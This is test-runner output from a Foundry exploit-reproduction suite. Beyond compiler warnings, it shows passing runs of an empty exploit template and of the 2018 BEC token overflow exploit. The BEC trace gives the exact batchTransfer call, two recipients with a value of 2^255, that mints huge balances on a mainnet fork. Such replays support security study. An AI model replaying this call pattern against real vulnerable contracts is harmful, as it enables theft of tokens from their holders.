Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 543.30ms (4.01ms CPU time)

Ran 1 test for src/test/2018-04/BEC_exp.sol:ContractTest
[PASS] testExploit() (gas: 84028)
Logs:
  Before Exploit, Attacker1 BEC Balance: 0.000000000000000000
  Before Exploit, Attacker2 BEC Balance: 0.000000000000000000
  After Exploit, Attacker1 BEC Balance: 57896044618658097711785492504343953926634992332820282019728.792003956564819968
  After Exploit, Attacker2 BEC Balance: 57896044618658097711785492504343953926634992332820282019728.792003956564819968

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 5483642 [5.483e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [84028] ContractTest::testExploit()
    ├─ [2605] 0xC5d105E63711398aF9bbff092d4B6769C82F793D::balanceOf(0xb4D30Cac5124b46C2Df0CF3e3e1Be05f42119033) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Before Exploit, Attacker1 BEC Balance", val: 0, decimals: 18)
    ├─ [2605] 0xC5d105E63711398aF9bbff092d4B6769C82F793D::balanceOf(0x0e823fFE018727585EaF5Bc769Fa80472F76C3d7) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Before Exploit, Attacker2 BEC Balance", val: 0, decimals: 18)
    ├─ [50673] 0xC5d105E63711398aF9bbff092d4B6769C82F793D::batchTransfer([0xb4D30Cac5124b46C2Df0CF3e3e1Be05f42119033, 0x0e823fFE018727585EaF5Bc769Fa80472F76C3d7], 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb4D30Cac5124b46C2Df0CF3e3e1Be05f42119033, value: 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823fFE018727585EaF5Bc769Fa80472F76C3d7, value: 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76])
    │   ├─  storage changes:
    │   │   @ 0x3be1e2448a35f6b7be219a40a465356f64763919d139879f2e02abf96f949486: 0 → 0x8000000000000000000000000000000000000000000000000000000000000000
    │   │   @ 0x619adf4e89044eb59f495442691d82cfaa53b6765403a928604ec5d109fa183f: 0 → 0x8000000000000000000000000000000000000000000000000000000000000000
    │   └─ ← [Return] true
    ├─ [605] 0xC5d105E63711398aF9bbff092d4B6769C82F793D::balanceOf(0xb4D30Cac5124b46C2Df0CF3e3e1Be05f42119033) [staticcall]
    │   └─ ← [Return] 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76]
    ├─ emit log_named_decimal_uint(key: "After Exploit, Attacker1 BEC Balance", val: 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76], decimals: 18)
    ├─ [605] 0xC5d105E63711398aF9bbff092d4B6769C82F793D::balanceOf(0x0e823fFE018727585EaF5Bc769Fa80472F76C3d7) [staticcall]
    │   └─ ← [Return] 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76]
    ├─ emit log_named_decimal_uint(key: "After Exploit, Attacker2 BEC Balance", val: 57896044618658097711785492504343953926634992332820282019728792003956564819968 [5.789e76], decimals: 18)
    ├─  storage changes:
    │   @ 0x619adf4e89044eb59f495442691d82cfaa53b6765403a928604ec5d109fa183f: 0 → 0x8000000000000000000000000000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.68s (1.35s CPU time)

Ran 2 test suites in 2.69s (3.23s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
